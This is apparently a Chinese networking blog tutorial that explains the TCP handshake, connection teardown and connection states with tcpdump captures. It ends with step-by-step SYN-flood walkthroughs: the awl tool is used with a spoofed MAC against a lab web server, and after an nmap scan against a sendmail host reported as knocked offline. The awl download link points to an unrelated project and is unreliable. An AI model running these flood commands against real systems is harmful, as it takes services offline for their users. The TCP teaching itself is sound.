TCP连接三次握手协议，释放连接四次挥手，以及使用 awl伪造mac地址进行多线程syn洪泛攻击。

这个TCP连接就是一次追女生-谈恋爱-分手，追求比分手简单，但是分手比追求复杂。哥，谈了半年的女朋友，在就快要成功了的时候分了，原因是因为有人在后面该老子背后搞SYN洪泛攻击，最后女朋友丢失了。学会TCP,教你追回你的前女友。不再为爱迷茫，是我的就是我的，别人怎么也拿不走。

Tcp  是传输层协议非常复杂的协议

1） TCP是面向连接的运输层协议，也就是说应用程序在使用TCP协议之前，必须先建立TCP连接在传输数据完成后，必须释放已经建立的TCP连接。

2） 每一条TCP连接只能有两个端点，每一条TCP连接只能是点对点（1:1）。

3） TCP提供可靠交付的服务，特点：无差错、不丢失、不重复、并且按时到达。

4） TCP提供全双工通信。

5） TCP面向字节流。

TCP 的连接

TCP把连接作为最基本的抽象。

TCP是一个端到端的协议，TCP的端点叫套接字或插口。

在RFC793中定义：端口号拼接到IP地址即构成套接字。（套接字 socket =(IP:Port) ）

每一条TCP连接唯一地被通信两端的连个端点所确定。

TCP 连接 ：：={socket1,socket} ={(IP1:Port1),(IP2:Port2)}

Socket（同名词代表的不同含义）

1） socket 是传输层和应用层之间的一种接口称为socket API,简称socket。

2） socketAPI中集成的函数 socket();

3） 调用socket()函数的端点称为socket,

4） 调用socket()函数时，其返回值称为socket描述符

5） 在操作系统中内核连网协议的Berkeley实现称为socket

上面这些socket 和RFC793中的不同

 

可靠传输的工作原理

 

Tcp 协议发送的报文是交给IP层传送

理想条件：

1）传输信道不产生差错

2）不管对方发送多少数据，接受方都能接收到。

1） 停止等待协议

发送数据时，发送方向接收方发送数据包，每当发送方完成一个分组数据的传输就停止发送，等待对方确认，在收到确认后再发送下一个分组。如果发生超时，发送方就会重传。

①无差错情况

 

②出现差错

出现差错时候注意三点

必须暂时保留自己发送的分组脚本，对方收到确认后才可以清除保留的副本；

超时计时器应比数据分组传输往返平均时间更长一些，

③确认丢失和迟到

接受方发送的socket迟到了，

第一：丢弃这个重复的分组M1,不向上层交付，

第二: 向A发送确认。

 

 

2） 连续ARQ协议

滑动窗口协议比较复杂，是TCP协议的精髓所在，

数据按照分组滑动发送，然后确认向前还是向后，确认后向前继续发送，这样就完成了连续发送，和累计确认，发送方对数据做了排序就可以累计发送，提高信道利用率。接受大批量数据时如果丢包后重传数据重复量较大。

 

TCP报文段的首部格式

1)     源端口和目的端口 各占两个字节，分别写入源端口号和目的端口号。

2)     序号 4字节

3)     确认号4字节

4)     数据偏移 占4位

5)     保留  

6)     紧急URG

7)     确认ACK

8)     推送PUSH

9)     复位RST

10)  同步 SYN

11)  终止FIN

12)  窗口    2 字节

13)  检验和 2字节

14)  紧急指针 2字节

15)  选项 最大40字节

Tcp运输连接管理，运输连接是用来传送TCP报文的，tcp运输连接的建立和释放是面向连接的通信必不可少的过程。运输连接有三个阶段，连接建立，数据传送，连接释放。

在连接过程中要解决以下三个问题

（1）     确认双方相互的存在。

（2）     要允许双方协商一些参数

（3）     能够对运输实体资源进行分配。

TCP三次握手

Tcp连接采用客户模式，主动发起方为客户，被动接收方为服务器

开始，A和B 都是处于关闭状态，A主动打开连接，发送一个信号，B被动的打开连接，

B 的CTP服务进程先创建传输控制块TCB,准备接受客户进程的连接请求。然后服务器进程处于Listen状态，等待客户的连接请求。

A de TCP 客户进程也首先创建出传输控制块TCB,然后向B发送连接请求报文段，这时候，首部的SYN = 1,同时选择一个初始序号 seq=x 。TCP规定SYN报文不能携带数据（SYN=1），但是要消耗一个序号，这时，tcp客户端进入 SYN-SENT（同步已经发送）状态。

       B收到连接请求报文后，如同意建立连接，则向A发送确认，再确认报文段中把SYN和ACK都置为1，确认号为ack=x+1,同时也为自己选择一个序号seq=y,请注意，这个报文段不能携带数据，，同样消耗一个序号，这样TCP服务器进程进入SYN-RECVD(同步收到)状态。

       TCP客户进程收到B的确认后，还要向B给出确认，确认报文段的ACK=1 确认号ack=y+1,自己的序列号为seq=x+1.  TCP 规定此时ACK可以携带报文。在这种情况下下一个数据报的序号任然是seq=x+1,这时TCP连接已经建立，A进入ESTABLISHED(已建立连接)状态。B收到确认后也进入ESTABLISHED(已建立连接)状态。

所以，以上建立连接过程为三次握手。（three-way handshake）.

四次握手协议

TCP连接释放过程比较复杂，数据传输结束后通信双方都可以关闭连接，现在处于连接状态ESTABLISHED

 

A 的进程连接先向其发送TCP发出连接释放报文段，并停止再发送数据，主动关闭TCP连接。A把连接释放报文段首部的终止位控制位FIN置为1，序号seq = u ,u=前面传送完成的数据的最后一个字节的序号+1.这个时候A进入FIN-WAIT-1（终止等待1）状态，等待B的确认，TCP 规定，FIN报文不准携带数据，其消耗一个序号。

       B收到连接释放报文段请求后确认，确认号ack = u +1, 而这个报文段自己的序号是v，等于B前面已传送过的最后一个字符的序号+1,然后进入CLOSE-WAIT（关闭等待）状态。TCP服务器进程这时通知最高层应用进程，因此A到B方向的连接就释放了，这时的TCP连接处于半关闭（half-close）状态，即A已经没有数据需要发送了，但是B 若发送数据，A任然要接受，也就是说从B到A 方向的连接还没关闭。这个状态会持续一段时间。

A收到B 的来信后进入FIN-WAIT-2(终止等待2)状态，等待B发出的连接释放报文。

若B没有要想A发送的数据，其应用进程就通知TCP释放连接。这时B发出的连接文FIN=1.现在假定B的序号为w（在半关闭状态B可能又发送了一条数）。B还必须重复上次已发送的确认号ack= u+1.这时候B进入LAST-ACK(最后确认)状态,等待A确认。

A在接受到B的连接释放报文后，必须对此发出确认。在确认报文段追中把ACK置为1，确认号ack=w+1, 自己的序号seq = u+1。(TCP标准，前面发送过的FIN报文要消耗掉一个序号)。然后进入到TIME-WAIT（等待时间）状态。请注意现在的TCP 还没释放掉，必须经过时间等待计时器设置的2MSL后，A才进入到CLOSED状态。时间MSL叫做最长报文段寿命，RFC793 中2分钟实际没这么长，因此A进入到TIME-WAIT状态后A经过4分钟才能到CLOSE状态，才能开始建立下一个新的连接，当A撤销相应的传输控制块TCB后，就结束了这次TCP连接。

B只要收到A发送的确认，就进入CLOSE关闭状态.B在撤销相应的传输控制块TCB后，就结束了这次的TCP连接。

上述的TCP连接过程称为四次握手。

为什么两次等待必须为2MSL时间？

第一：为了保证A发送的最后一个ACK报文能够到达B

第二：防止上一节提到的“以失效的连接请求报文段”，出现在本连接中。

 

 一，TCP三次握手及TCP连接状态

        TCP报文首部格式：

解释以上信息：

ACK: TCP协议规定，只有ACK=1时有效，连接建立后所有发送的报文ACK必须为1

SYN（SYNchronization同步）:在连接建立用来同步序号。当SYN＝1而ACK=0时，表明这是一个连接请求报文。对方若同意建立连接，则应在响应报文中使用SYN=1和ACK=1因此，SYN置1表示这是一个连接请求或连接接受报文。

FIN（FINIS）即完，终结的意思，用来释放一个连接。当FIN=1时，表明此报文段发送方的数据已经发送完毕，并要求释放连接。

 

 

建立TCP连接时的TCP三次握手和断开TCP连接时的4次挥手整体过程如下图：

下面进行实战：使用tcpdump抓取TCP三次握手

TCP三次握手过程：

1. 首先由Client发出请求连接即SYN=1,声明自己的序号seq=X

2.然后Server进行回复确认，即SYN=1 声明自己的序号seq=y，并设置ack=x+1

3.最后Client再进行一次确认，设置seq=x+1 ack+y+1

注：seq 序列号范围：2^32-1  如果超过最大值，再从0开始

       seq 序列号作用：依据这个序列号来组数据，如果发N个数据包，服务端会按序列号来重新组装数据

 

实战1：使用tcpdump抓包查看TCP三次握手过程：

tcpdump 常用参数：

 －c     指定包个数

 －n     ip,端口用数字方式显示

port     指定端口

 

Client:192.168.180.162          server:192.168.180.163

在clent上登陆，抓取ssh远程产生的tcp三次握手包：

[root@zylei 桌面]# tcpdump port 22 -c 3 -n 

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

#提示一直在监听eth0

再另一个虚拟终端通过ssh连接到server端

[root@zylei 桌面]# ssh root@192.168.180.163

root@192.168.180.163's password:

回到原来虚拟终端上来

[root@zylei 桌面]# tcpdump port 22 -c 3 -n 

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

10:52:18.963529 IP 192.168.180.162.40274 > 192.168.180.163.ssh: Flags [S], seq 702394658, win 14600, options [mss 1460,sackOK,TS val 86694762 ecr 0,nop,wscale 6], length 0

10:52:18.963768 IP 192.168.180.163.ssh > 192.168.180.162.40274: Flags [S.], seq 3287233370, ack 702394659, win 28960, options [mss 1460,sackOK,TS val 70267731 ecr 86694762,nop,wscale 7], length 0

10:52:18.963791 IP 192.168.180.162.40274 > 192.168.180.163.ssh: Flags [.], ack 1, win 229, options [nop,nop,TS val 86694762 ecr 70267731], length 0

3 packets captured

3 packets received by filter

0 packets dropped by kernel

#Flag[S]中的S表示为SYN包为1  。client主机返回ack=1 这个值为相对序号，如果想查看完整序号可以命令后面加－S

[root@zylei 桌面]# tcpdump port 22 -c 3 -n -S

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

11:04:01.333723 IP 192.168.180.162.40276 > 192.168.180.163.ssh: Flags [S], seq 143195220, win 14600, options [mss 1460,sackOK,TS val 87397132 ecr 0,nop,wscale 6], length 0

11:04:01.334138 IP 192.168.180.163.ssh > 192.168.180.162.40276: Flags [S.], seq 3639491649, ack 143195221, win 28960, options [mss 1460,sackOK,TS val 70970102 ecr 87397132,nop,wscale 7], length 0

11:04:01.334158 IP 192.168.180.162.40276 > 192.168.180.163.ssh: Flags [.], ack 3639491650, win 229, options [nop,nop,TS val 87397133 ecr 70970102], length 0

3 packets captured

3 packets received by filter

0 packets dropped by kernel

 

TCP连接状态

服务器端：LISTEN：侦听来自远方的TCP端口的连接请求

客户端：SYN-SENT：再发送连接请求后等待匹配的连接请求

服务器端：SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认

客户端/服务器端：ESTABLISHED：代表一个打开的连接

 

客户端：FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认

服务器端：CLOSE-WAIT：等待从本地用户发来的连接中断请求

客户端：FIN-WAIT-2：从远程TCP等待连接中断请求

服务器端：LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认

客户端：TIME-WAIT：等待足够的时间以确保远程TCP接收到连接中断请求的确认

服务器端：CLOSED：没有任何连接状态

 

SYN洪水攻击概述：

SYN洪水攻击主要源于： tcp协议的三次握手机制

tcp协议面向链接的协议

SYN洪水攻击的过程：

在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端，如果发起的客户是一个不存在的客户端，那么服务端就不会接到客户端回应的ACK包。

这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接，直到等待超关闭时间，才能施放内存。

如果恶意者通过通过ip欺骗，发送大量SYN包给受害者系统，导致服务端存在大量未决的连接并占用大量内存和tcp连接，从而导致正常客户端无法访问服务端，这就是SYN洪水攻击的过程。

3：使用awl伪装MAC对内网的服务器施实syn洪水攻击

 

 

实战拓扑图：

在客户机上安装awl软件进行攻击

下载地址：

https://gitlab.com/davical-project/awl/tags

上传到linux系统中

开始安装awl   0.5*之后的版本不能使用

[root@zylei ~]#tar zxvf awl-0.2.tar.gz  #解压

[root@zylei ~]#cd awl-0.2

[root@zylei awl-0.2]#./configure   # 查检软件包安装环境

[root@zylei awl-0.2]#make  -j  4   

#make  把源代码编译成可执行的二进制文件

# -j 4以4个进程同时编译，速度快

[root@zylei awl-0.2]#make install   #安装

查看安装的命令：

[root@zylei awl-0.2]# which awl

/usr/local/bin/awl

在xuegod64上搭建一台web服务器，模拟要被攻击的服务器

[root@carl ~]# yum install httpd -y  #安装web服务器

 

[root@carl ~]# service httpd start

开始攻击：

实战4： 在局域网中使用 awl伪装MAC地址进行多线程SYN攻击

 

获取对方的IP地址解析成MAC地址

[root@zylei ~]# ping 192.168.180.163

 

[root@zylei ~]# arp -n

Address                  HWtype  HWaddress           Flags Mask            Iface

192.168.180.163          ether   00:0c:29:cc:16:4d   C                     eth0

192.168.180.220          ether   02:09:0f:78:d0:42   C                     eth0

192.168.180.207          ether   60:a4:4c:4d:86:75   C 

 

开始攻击：

awl参数如下:

-i 发送包的接口,如果省略默认是eth0

-m 指定目标mac地址    注：如果-m没有指定mac，默认目标MAC地址是“FF.FF.FF.FF.FF.FF”，FF.FF.FF.FF.FF.FFMAC地址是什么？

这表示向同一网段内的所有主机发出ARP广播，进行SYN攻击，还容易使整个局域网瘫痪。

 

-d 被攻击机器的IP

-p 被攻击机器的端口

 

[root@zylei ~]# awl -i eth0 -m 00:0c:29:cc:16:4d -d 192.168.180.163 -p 80

 

 

测试攻击效果：

在server (carl)上查看：发现很多伪装成公网的IP在攻击我们

[root@carl ~]# netstat -antup |grep 80

 

Awl 安装，以及测试攻击

一,安装:
tar -zxvf awl-0.2.tar.gz
./configure --prefix=/usr/local/awl
make 
make install

awl的执行程序安装后在/usr/local/awl/bin目录下

二,说明:
awl 的格式如下:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d ip -p port

参数如下:
-i 发送包的接口,如果省略默认是eth0
-m 被***机器的mac地址,程序不能根据被***IP得到MAC,需要手工指定.先ping 目标IP,再arp -a就可以看到.如果省略则为ff:ff:ff:ff:ff:ff
-d 被***机器的IP
-p 被***机器的端口.

三,测试,
服务器端:Centos   5.4
对方服务器:redhat  运行邮件服务器，sendmail

1,首先得知对方IP
运行nmap -v -A 10.122.89.106 查看对方开了啥服务
[root@localhost bin]# nmap -v -A 10.122.89.106


Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-06-02 19:24 CST
DNS resolution of 1 IPs took 0.39s.
Initiating SYN Stealth Scan against 10.122.89.106 [1680 ports] at 19:24
Discovered open port 21/tcp on 10.122.89.106
Discovered open port 25/tcp on 10.122.89.106
Discovered open port 22/tcp on 10.122.89.106
Discovered open port 443/tcp on 10.122.89.106
Discovered open port 80/tcp on 10.122.89.106
Discovered open port 199/tcp on 10.122.89.106
Discovered open port 110/tcp on 10.122.89.106
Discovered open port 143/tcp on 10.122.89.106
Discovered open port 3306/tcp on 10.122.89.106

得知对方开了如上端口

ping 10.122.89.106 得知mac地址
查看arp -a 得知对方IP的MAC地址

2.开始***:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d 10.122.89.106 -p 25

ping 10.122.89.106 -t 查下对方反应

四,测试效果
***一开始,对方明显挂掉,各种应用无反应,
如下是抓包:
[root@localhost ~]# tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

以上实验只用于学习TCP，严静用于违法犯罪。

不当使用，后果自负。未经博主同意不得转载。